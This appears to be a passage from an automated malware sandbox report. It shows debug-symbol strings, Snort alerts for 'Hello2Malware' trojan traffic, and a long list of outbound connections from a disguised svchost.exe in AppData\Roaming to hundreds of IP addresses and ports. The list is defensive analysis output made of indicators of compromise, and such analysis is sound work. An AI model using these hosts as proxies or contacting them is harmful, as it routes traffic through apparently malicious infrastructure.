Source:	Binary string: mscorlib.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Management.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Drawing.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Management.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: caspol.pdb source: VHFSQv.exe.16.dr
Source:	Binary string: System.Core.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.pdbIL_STUB_PInvoke source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856463 ETPRO TROJAN DNS Query to Hello2Malware Domain 192.168.2.5:60774 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2856466 ETPRO TROJAN Observed Hello2Malware Domain in TLS SNI 192.168.2.5:51523 -> 172.67.140.87:443
Source: Traffic	Snort IDS: 2856466 ETPRO TROJAN Observed Hello2Malware Domain in TLS SNI 192.168.2.5:51524 -> 172.67.140.87:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.171.243.253 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.245.159.177 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 24.230.33.96 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.216.51.36 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.162.229.215 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.15.139.15 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 18.135.133.116 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.234.24.116 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.61.48.24 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.154.178.243 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 98.71.76.170 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 121.128.194.154 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 207.244.255.174 19770
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.43.63.70 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.152.232.217 8181
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.162.135.201 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.95.13.18 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.162.15.98 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.90.22.106 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.70.12.54 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.25.210.102 33240
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.136.182.110 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 101.51.121.29 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.68.235.51 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.5.77.211 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 63.151.67.7 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.243.177.21 8088
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 46.17.63.166 9480
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 62.171.131.101 25847
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.20.94.93 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.11.95.166 6005
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 123.126.158.50 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.25.230.252 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.116.2.52 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.61.55.138 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.57.131.122 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 78.128.81.220 31623
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.47.93.248 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 134.209.29.120 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.162.105.202 8000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 8.219.228.100 15673
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.11.95.165 5000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.235.124.143 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 187.216.144.170 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 158.255.215.50 16993
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 207.180.234.220 47476
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.252.209.80 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.200.220 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 113.68.62.135 9080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.59.156.167 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 64.56.150.102 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 155.50.215.37 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 74.103.66.15 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 168.228.36.22 27234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.238.228.202 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.56.83.46 8047
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.94.90.189 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.47.93.244 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.145.6.32 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.203.7 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.37.180.40 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.115.232.79 31280
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 211.54.26.187 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 69.61.200.104 36181
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 125.94.219.96 9091
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.190.171.137 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 96.80.235.1 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.98.197 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.190.170.254 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 27.123.1.35 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.203.104.153 8200
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 169.57.157.148 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 167.250.99.22 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.23.56 41383
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.99.27.26 8090
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 188.163.170.130 41209
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.190.57.169 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 218.75.69.50 57903
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 169.57.157.146 8123
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.14.66 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 164.92.86.113 60283
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.8.111.196 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 116.242.89.230 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.131.248.165 15673
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 140.82.113.3 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.47.93.223 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 60.190.68.154 7302
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 180.180.152.94 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 188.127.236.58 56694
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.185.196.38 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.214.102.195 50366
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.93.76.26 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.236.179.235 1981
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 217.115.115.253 56792
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.49.30.5 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.106.115.50 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 77.46.138.37 33608
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.17.9.114 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.0.228.120 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 20.33.5.27 8888
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 194.4.50.127 12334
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 62.3.6.76 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.19.59.19 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.139.242.1 84
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.12.178.107 29985
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.148.28.218 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 203.96.177.211 33382
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 23.152.40.14 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.76.253.66 3129
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.223.108.13 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.236.0.129 22167
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 107.180.88.173 35774
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 88.198.82.189 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.190.24.119 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.169.249.16 8362
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 166.62.38.100 56191
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 92.205.110.47 14936
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 46.253.143.144 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.125.215.188 8090
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 111.91.231.65 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.76.217.175 8088
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 58.69.201.117 8082
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 14.207.167.114 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 187.122.105.181 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.167.38.7 45650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.6.97 59991
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 95.87.30.11 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.235.9 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 173.212.206.86 55405
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.158.204 52980
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 198.49.68.80 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.229.100.73 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.172.120.91 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 37.187.77.58 19767
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 114.141.61.2 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.20.179.187 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.13.204.24 8082
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 92.204.135.37 26927
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.189.116.108 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.36.150.15 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 64.201.163.133 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.36.150.16 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.19.106.11 12334
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.156.73.54 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 191.97.16.160 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 200.94.96.174 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.231.110.26 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.237.210.215 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.110.34.243 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 124.163.236.54 7302
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 157.245.157.72 60490
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.195.225.34 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.147.193 43131
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 87.247.251.240 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.214.112.68 32323	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.236.47.242 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.26.241.120 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.36.150.28 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.92.204.54 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.156.73.61 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 85.113.55.123 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.189.163.210 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.217.223.145 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 83.220.234.102 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.19.225.70 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 34.49.208.221 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.200.12.81 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.90 25257
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.174.102.127 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.51.112.169 5430
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 116.118.98.9 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.130.106.169 83
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 143.208.152.60 3180
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.255.224 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.4.123.41 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.131.29.213 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 44.190.9.65 48100
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.234.55.173 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.200.12.83 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.92.4.113 35528
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 209.14.112.2 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 83.221.222.240 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 209.14.112.3 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.200.12.84 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.38.181.129 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 217.172.122.14 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.154.71.72 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.33.163.156 42380
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.70.189.30 38880
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 173.249.29.243 9123
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 121.205.69.62 21212
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 98.175.31.195 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.217.158.202 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.243.102.207 9764
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.164.38.189 2306
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 54.233.119.172 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.44.82.2 38080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.170 1911
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.21.223.181 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 117.30.118.200 8118
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 60.188.102.225 18080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.87.172.133 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 3.128.142.113 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.63.44 3128	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.173 10677
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 203.154.39.146 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 171.100.22.133 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.171 5369
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 74.207.241.80 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.78.95.41 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.191.127.21 8090
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 157.100.6.202 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.78.95.40 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 39.108.229.14 8002
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 15.207.196.77 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.127.1.130 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 116.58.227.224 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.3.37.213 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 80.169.243.234 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 110.74.195.239 51080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 130.255.162.199 44234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 3.24.58.156 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 209.97.176.112 11793
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.90.223.124 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 120.194.4.157 5443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.12.253.232 57447
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.207.38.66 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 101.255.165.130 1111
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.212.212 33905
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.126.173.73 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 62.182.114.164 59623
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.192.102.249 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.35.32.249 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.222.241.157 27206
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 49.7.11.187 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.219.133.106 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 128.199.221.91 33383
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 141.8.195.143 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.55.26.132 31280
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.54.21.203 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 197.248.249.147 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.164.116.172 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.7.4.89 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 141.98.248.19 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.4.117.153 5020
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 183.80.130.9 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 160.248.80.91 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 167.99.131.11 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.149.103.133 61859
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 117.241.132.95 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.129.199.57 8800
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.77.108.208 9050
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.105.234 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.117.225.195 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.150.151.138 4995
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 163.172.131.178 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.89.16.111 49528
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.236.160.186 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 66.171.186.47 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.93.68.47 41890
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.128.133.1 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.254.198.237 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.177.217.131 52858
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.242.3.214 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 203.202.253.108 5020
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.172.42.121 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.173.42 53948
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.57.245.250 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 165.227.82.7 24668
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.18.149.110 5020
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.109.184.150 56067
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 49.51.93.222 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 114.231.45.178 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.72.82.9 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.98.93.234 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.190.192.57 61221
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.149.194.40 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.17.248.164 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 108.181.132.115 35850
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.137.111.231 8086
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.81.220.33 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.35.15 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 222.223.103.232 7302
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.59.243.214 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.110.59.82 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.173.78 35981
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.206.38.46 37630
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.236.97 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 67.213.210.175 25155
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.206.250 35703
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.23.252.168 9180
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 37.187.91.192 21981
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 64.225.48.234 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.111.160.41 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 107.180.88.41 58037
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.79.254.236 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 198.23.176.76 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 124.223.186.186 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.234.194.155 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.145.137.102 37447
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 140.83.32.175 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 52.73.224.54 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 82.165.105.48 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.214.227.68 60433
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.92.77.241 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 70.166.167.38 57728
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.206.84 2536
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.172.218.164 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.25.64.27 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.207.199.82 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 199.58.185.9 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 207.180.198.241 17228
